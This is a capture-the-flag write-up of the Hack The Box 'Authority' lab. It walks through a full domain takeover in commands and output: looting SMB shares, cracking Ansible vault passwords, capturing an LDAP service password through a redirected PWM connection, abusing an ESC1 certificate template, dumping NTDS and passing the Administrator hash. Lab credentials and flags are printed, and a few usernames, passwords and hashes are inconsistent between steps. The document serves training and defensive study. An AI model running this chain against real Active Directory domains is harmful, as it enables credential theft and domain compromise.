# HTB - Authority

<figure><img src="/files/4hc739sg9c761vRhCBWg" alt=""><figcaption></figcaption></figure>

## Description

***

Authority is a medium-difficulty Windows machine that highlights the dangers of misconfigurations, password reuse, storing credentials on shares, and demonstrates how default settings in Active Directory (such as the ability for all domain users to add up to 10 computers to the domain) can be combined with other issues (vulnerable AD CS certificate templates) to take over a domain.

## Enumeration

***

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
8443/tcp open  https-alt

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn 

PORT     STATE  SERVICE
53/udp   open   domain
88/udp   open   kerberos-sec
123/udp  open   ntp
389/udp  open   ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nmap -p53,80,88,135,139,389,445,8443 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos                
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Active Directory LDAP (Domain: authority.htb)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2024-11-09T16:43:18+00:00; +4h00m00s from scanner time.
445/tcp  open  microsoft-ds?
636/tcp open   ldapssl
8443/tcp open  ssl/https-alt

..snip..
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
| smb2-time: 
|   date: 2024-11-09T16:43:10
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
```

**Summary**

```R
* Open ports: 53,80,88,135,139,389,445,8443
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - RPC - SMB - KERBEROS - LDAP
* Important notes: Domain: authority.htb
```

**hosts file**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $sudo sh -c "echo  '$ip AUTHORITY authority.htb AUTHORITY.authority.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $tail -n1 /etc/hosts
10.10.11.222 AUTHORITY authority.htb AUTHORITY.authority.htb
```

After discovering the open ports and updating the `/etc/hosts` file, I will move on to enumerating the running services one by one.

**HTTP Enumeration**

Visiting `http://authority.htb/` shows the default IIS webpage

<figure><img src="/files/BoiUn5TVmZSuiz527IUq" alt=""><figcaption></figcaption></figure>

When I fuzzed the website, I got nothing for either directories or files, so I will move on to the webapp on port `8443`

<figure><img src="/files/lA9Y8W97p5FHkphUZOwM" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/wBomceUjLF9MGk4GLohH" alt=""><figcaption></figcaption></figure>

When I visit the site at `http://authority.htb:8443/`, it tells me it needs TLS, so I will try accessing it over `https`

<figure><img src="/files/dMjIA0UFlzryNAvAdLU2" alt=""><figcaption></figcaption></figure>

When I visit the same URL but with `https`, I'm redirected to `https://authority.htb:8443/pwm/private/login`

<figure><img src="/files/F9R9rWxUnh2BbpjEiEzR" alt=""><figcaption></figcaption></figure>

> This message states that the `Webapp` is in `Configuration mode`, which allows updating the configuration without LDAP authentication

There are also two buttons here, and both of them lead to the same page

<figure><img src="/files/7byDX7kWz6fARju2OmEx" alt=""><figcaption></figcaption></figure>

I can see an LDAP distinguished name here with the username `svc_pwm` and a DC of `htb.corp`

<figure><img src="/files/7RTdoIoJRvC4tbN9qL8Y" alt=""><figcaption></figcaption></figure>

When I tried to authenticate with `*:*` (to test for LDAP injection), I got an error that reveals another username, `svc_ldap`. I get the same error with any other credentials

<figure><img src="/files/tKWFMPJNN2THJy1WdIU7" alt=""><figcaption></figcaption></figure>

From here there isn't much more I can do, so I will move on to the other services (SMB, Kerberos, etc.)

**Kerberos Enumeration**

Unluckily, this user can't be AS-REP roasted

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-GetNPUsers authority.htb/svc_ldap@10.10.11.222 -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Getting TGT for svc_ldap@10.10.11.222
[-] User svc_ldap@10.10.11.222 doesn't have UF_DONT_REQUIRE_PREAUTH set
```

**SMB & RPC Enumeration**

RPC gives no data with a null session

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
```

Here I can see that I have `READ` access on the `Development` share

<figure><img src="/files/kZqQcc8viCrYNGjYFoEJ" alt=""><figcaption></figcaption></figure>

There are several files in this share but none of them are useful, and I can see an `ADCS` folder, so it might be an indicator that a PKI exists

```bash
nxc smb authority -u 'guest' -p '' -M spider_plus
cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.222.json

..snip..
{
    "Development": {
        "Automation/Ansible/ADCS/.ansible-lint": {
            "atime_epoch": "2023-03-17 09:20:48",
            "ctime_epoch": "2023-03-17 09:20:48",
            "mtime_epoch": "2023-03-17 09:37:52",
            "size": "259 B"
        },
        "Automation/Ansible/ADCS/.yamllint": {
            "atime_epoch": "2023-03-17 09:20:48",
            "ctime_epoch": "2023-03-17 09:20:48",
            "mtime_epoch": "2023-03-17 09:37:52",
            "size": "205 B"
        },
        "Automation/Ansible/ADCS/LICENSE": {
            "atime_epoch": "2023-03-17 09:20:48",
            "ctime_epoch": "2023-03-17 09:20:48",
            "mtime_epoch": "2023-03-17 09:37:52",
            "size": "11.1 KB"
        },
        "Automation/Ansible/ADCS/README.md": {
            "atime_epoch": "2023-03-17 09:20:48",
            "ctime_epoch": "2023-03-17 09:20:48",
            "mtime_epoch": "2023-03-17 09:37:52",
            "size": "7.11 KB"
..snip..
```

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-smbclient authority.htb/guest@10.10.11.222
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:

$ shares
ADMIN$
C$
Department Shares
Development
IPC$
NETLOGON
SYSVOL
```

I found several files containing passwords, but none of them worked

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat ansible_inventory

ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignore

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat tomcat-users.xml.j2

..snip..
<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>  
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>
</tomcat-users>
```

Under `PWN/defaults/`, there is a file containing Ansible vault secrets

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ cat pwn/defaults/main.yml

..snip..
ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764
```

I ran the command and it asked for a password, so I supplied `Welcome1` (found earlier), but it gave me this error

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible-vault decrypt main.yml
Vault password: 
ERROR! input is not vault encrypted data. /home/kali/HackTheBox/platform/machines/Authority/main.yml is not a vault encrypted file for /home/kali/HackTheBox/platform/machines/Authority/main.yml
```

I realised I was doing something wrong: I should extract the hashes from these secrets and crack them to get the correct vault password

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat main.yml

$ANSIBLE_VAULT;1.1;AES256
326665343864353665376531366637316331386162643232303835663339663466623131613262396134353663663462373265633832356663356239383039640a346431373431666433343434366139356536343763336662346134663965343430306561653964643235643733346162626134393430336334326263326364380a6530343137333266393234336261303438346635383264396362323065313438

$ANSIBLE_VAULT;1.1;AES256
313563383439633230633734353632613235633932356333653561346162616664333932633737363335616263326464633832376261306131303337653964350a363663623132353136346631396662386564323238303933393362313736373035356136366465616536373866346138623166383535303930356637306461350a3164666630373030376537613235653433386539346465336633653630356531

$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764
```

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret1 > secret1.hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret2 > secret2.hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ansible2john secret3 > secret3.hash
```

Modify the output hashes to match this format:

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $cat ansible.hashes

$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5
$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635
```

## Foothold

***

Cracking with hashcat in `auto-detect` hash mode gives me the same password for all three hashes

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $ hashcat hashes.txt /usr/share/wordlists/rockyou.txt 

$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed228809393b1767055a66deae678f4a8b1f8550905f70da5:!@#$%^&*

$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647cc3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8:!@#$%^&*

$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73aad5d8804b4b2511c3b15814ebcf2fe98334284203635:!@#$%^&*

Session..........: hashcat
Status...........: Cracked
```

I followed this post to decrypt the secrets:

{% embed url="<https://www.shellhacks.com/ansible-vault-encrypt-decrypt-string/>" %}

First I need to install the `ansible` package to get the `ansible-vault` command

```bash
sudo apt install ansible
```

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764' | ansible-vault decrypt --vault-password-file=vault.txt

Decryption successful
DevT3st@123

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
326665343864353665376531366637316331386162643232303835663339663466623131613262396134353663663462373265633832356663356239383039640a346431373431666433343434366139356536343763336662346134663965343430306561653964643235643733346162626134393430336334326263326364380a6530343137333266393234336261303438346635383264396362323065313438' | ansible-vault decrypt --vault-password-file=vault.txt

Decryption successful
svc_pwm

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $echo '$ANSIBLE_VAULT;1.1;AES256
313563383439633230633734353632613235633932356333653561346162616664333932633737363335616263326464633832376261306131303337653964350a363663623132353136346631396662386564323238303933393362313736373035356136366465616536373866346138623166383535303930356637306461350a3164666630373030376537613235653433386539346465336633653630356531' | ansible-vault decrypt --vault-password-file=vault.txt

Decryption successful
pWm_@dm!N_!23
```
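The hash conversion above and the decryption here both rest on the layout of a vault 1.1 payload. This added Python example (not from the writeup) parses the `ldap_admin_password` blob from `main.yml` into the `$ansible$` line that ansible2john produces, and checks a candidate password offline using only stdlib PBKDF2 and HMAC, which is why a vault with a weak password sitting on a share is as good as plaintext.

```python
import binascii
import hashlib
import hmac

# The vaulted ldap_admin_password from main.yml on the Development share (page data)
VAULT_TEXT = """$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a643034623530623439616136363563346462373361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764"""


def parse_vault(vault_text):
    """Split a vault 1.1/AES256 blob into (salt, hmac, ciphertext), all as hex strings."""
    header, _, payload = vault_text.strip().partition("\n")
    if not header.startswith("$ANSIBLE_VAULT;1.1;AES256"):
        raise ValueError("not an Ansible Vault 1.1 AES256 payload")
    # The body is hex text (wrapped at 80 columns in real files); decoding it yields
    # "salt\nhmac\nciphertext", and each of those three fields is hex-encoded again.
    inner = binascii.unhexlify("".join(payload.split()))
    salt_hex, hmac_hex, ct_hex = inner.split(b"\n")
    return salt_hex.decode(), hmac_hex.decode(), ct_hex.decode()


def to_john_format(vault_text):
    """Build the $ansible$ line john/hashcat expect (what ansible2john prints, minus the filename)."""
    salt, mac, ct = parse_vault(vault_text)
    return f"$ansible$0*0*{salt}*{ct}*{mac}"


def check_vault_password(vault_text, password):
    """Test a candidate password without decrypting anything.

    Vault 1.1 derives 80 bytes with PBKDF2-HMAC-SHA256 (10000 rounds) over the salt:
    key1 (AES-256-CTR key), key2 (HMAC key) and the 16-byte IV. The stored HMAC is
    HMAC-SHA256(key2, ciphertext), so a guess can be verified from key2 alone;
    that is exactly what makes offline cracking possible.
    """
    salt, mac, ct = parse_vault(vault_text)
    derived = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt), 10000, dklen=80)
    key2 = derived[32:64]
    expected = hmac.new(key2, bytes.fromhex(ct), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


if __name__ == "__main__":
    print(to_john_format(VAULT_TEXT))
    for guess in ("Welcome1", "!@#$%^&*"):
        print(f"{guess!r}: {'correct' if check_vault_password(VAULT_TEXT, guess) else 'wrong'}")
```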

I tried several combinations of usernames and passwords. Only this one worked

<figure><img src="/files/XHDIucCKneueJV2GbrUM" alt=""><figcaption></figcaption></figure>

I checked for share access with these credentials and got access denied

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc smb authority -u svc_pwn -p 'pWm_@dm!N_!23' --shares

SMB         10.10.11.222    445    AUTHORITY        [+] authority.htb\svc_pwn:pWm_@dm!N_!23 
SMB         10.10.11.222    445    AUTHORITY        [-] Error enumerating shares: STATUS_ACCESS_DENIED
```

## Lateral Movement

***

I realised that this is a dead end because `svc_pwn` can't authenticate to LDAP either. I will try the credentials against the webapp on port `8443`.

The password worked on the `Configuration Manager` tab only, not on the main login form

<figure><img src="/files/MlGrb5G8HwgZvElVSlWy" alt=""><figcaption></figcaption></figure>

Under `Configuration Editor`, there is a `Connection` tab with several fields. I can see that the `svc_ldap` user's credentials are stored on the server and used to connect to `ldaps://authority.authority.htb:636`, so if I change this value to my host's IP, I can capture the credentials.

<figure><img src="/files/OqQkXzyc79kZR0fV1wMQ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/IgAWQdCABQ2kVDGIb8BC" alt=""><figcaption></figcaption></figure>

And then click on `Test LDAP Profile`

<figure><img src="/files/kmi0Gv49P1r9QD1nZ0eU" alt=""><figcaption></figcaption></figure>

```R
svc_ldap:htblDaP_1n_th3_cle4r!
```

Now I have a valid domain account, access via `WinRM`, and I know that AD CS exists.

<figure><img src="/files/iQ8dWHFUKx2hp44SiXi7" alt=""><figcaption></figcaption></figure>

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $evil-winrm -i authority -u svc_ldap -p 'lDaP_1n_th3_cle4r!' 

*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> type user.txt
394683251efed7605f3dfa7c20d37ad1
```

> User Flag: 394683251efed7605f3dfa7c20d37ad1

## Privilege Escalation

***

Since ADCS exists, I will check for vulnerable templates with `Certipy`

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy find -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA

..snip..
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA

..snip..

    [!] Vulnerabilities
      ESC1                              : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
```

Domain Computers can abuse ESC1 to get `Domain Admins` privileges by specifying a subject alternative name of a privileged user in the domain (Administrator), and I can create a computer account myself if the `machine account quota` is not set to zero.
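As an added defender-side check (not from the writeup), the following Python evaluates a template's `msPKI-*` attributes for the ESC1 conditions just described, treating `Domain Computers` as a low-privileged enroller only when the MachineAccountQuota is non-zero, which ties the template finding to the quota check. The `CORP_VPN` dict is a constructed sample modelled on what Certipy reported; the attribute names are the real LDAP attributes, while `enrollment_rights` is a simplified stand-in for the template's security descriptor.

```python
# Flag bits and EKU OIDs from the AD CS certificate template schema
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag: manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}


def esc1_findings(template, machine_account_quota):
    """Return the ESC1 conditions a template satisfies; an empty list means not ESC1.

    All conditions must hold together: a low-privileged principal can enroll, the
    enrollee supplies the subject/SAN, the certificate is usable for authentication,
    and neither manager approval nor a co-signature gates the request.
    """
    name_flag = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flag = template.get("msPKI-Enrollment-Flag", 0)
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    # Strip the "DOMAIN\" prefix so group names compare cleanly
    enrollers = {p.split("\\")[-1] for p in template.get("enrollment_rights", [])}

    reachable = enrollers & LOW_PRIV_GROUPS
    # Domain Computers only counts as low-privileged if any user can create a machine account
    if machine_account_quota == 0:
        reachable.discard("Domain Computers")

    checks = [
        (bool(reachable), f"low-privileged enrollers: {sorted(reachable)}"),
        (bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT), "enrollee supplies subject (SAN)"),
        (not ekus or bool(ekus & AUTH_EKUS), "EKU allows client authentication"),
        (not (enroll_flag & CT_FLAG_PEND_ALL_REQUESTS), "no manager approval required"),
        (template.get("msPKI-RA-Signature", 0) == 0, "no authorized signatures required"),
    ]
    if all(ok for ok, _ in checks):
        return [why for _, why in checks]
    return []


# Constructed sample modelled on the CorpVPN template Certipy flagged on this box
CORP_VPN = {
    "name": "CorpVPN",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment_rights": ["AUTHORITY.HTB\\Domain Computers", "AUTHORITY.HTB\\Domain Admins"],
}

# Hardened variant: no enrollee-supplied subject and manager approval turned on
HARDENED = dict(CORP_VPN, **{"msPKI-Certificate-Name-Flag": 0,
                             "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS})

if __name__ == "__main__":
    for maq in (10, 0):
        print(f"MAQ={maq}: {esc1_findings(CORP_VPN, maq) or 'not ESC1'}")
    print("hardened:", esc1_findings(HARDENED, 10) or "not ESC1")
```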

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc ldap authority -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -M maq

LDAPS       10.10.11.222    636    AUTHORITY        [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r! 
MAQ         10.10.11.222    389    AUTHORITY        [*] Getting the MachineAccountQuota
MAQ         10.10.11.222    389    AUTHORITY        MachineAccountQuota: 10
```

The value is 10, so I can add a new computer account

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $impacket-addcomputer authority.htb/svc_ldap@authority.authority.htb -computer-name 'blind0bandit$' -computer-pass 'blind0bandit@@!!!@@' -dc-host authority.authority.htb -k
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] CCache file is not found. Skipping...
[*] Successfully added machine account blind0bandit$ with password blind0bandit@@!!!@@.
```

Request a certificate with the Administrator's UPN in the SAN

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy req -u 'blind0bandit$@authority.htb' -p 'blind0bandit@@!!!@@' -ca AUTHORITY-CA -template CorpVPN -upn administrator@authority.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
```

> I get `KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)`, which means the KDC does not support PKINIT authentication, but fortunately `Certipy` has an `-ldap-shell` option

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $certipy auth -pfx administrator.pfx -dc-ip 10.10.11.222 -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Connecting to 'ldaps://10.10.11.222:636'
[*] Authenticated to '10.10.11.222' as: u:HTB\Administrator
Type help for list of commands

# change_password 'authority$'
Got User DN: CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
Attempting to set new password of: X!xJ#)>|HFPi";;
Password changed successfully!
```

> I changed the password of the DC machine account instead of the Administrator's to minimize the damage

Dump the NTDS secrets to get the Administrator hash

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $nxc smb 10.10.11.222 -u 'authority$' -p 'X!xJ#)>|HFPi";;' --ntds --user administrator

SMB    10.10.11.222    445    AUTHORITY        Administrator:500:aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928xxxxxxxxxxx:::
```

Access the machine now :))

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Authority]
└──╼ $evil-winrm -i authority -u administrator -H 6961f422924da90a6928xxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
1c920b7d7e0303262573017ecc5e09d0
```

> Root Flag: 1c920b7d7e0303262573017ecc5e09d0

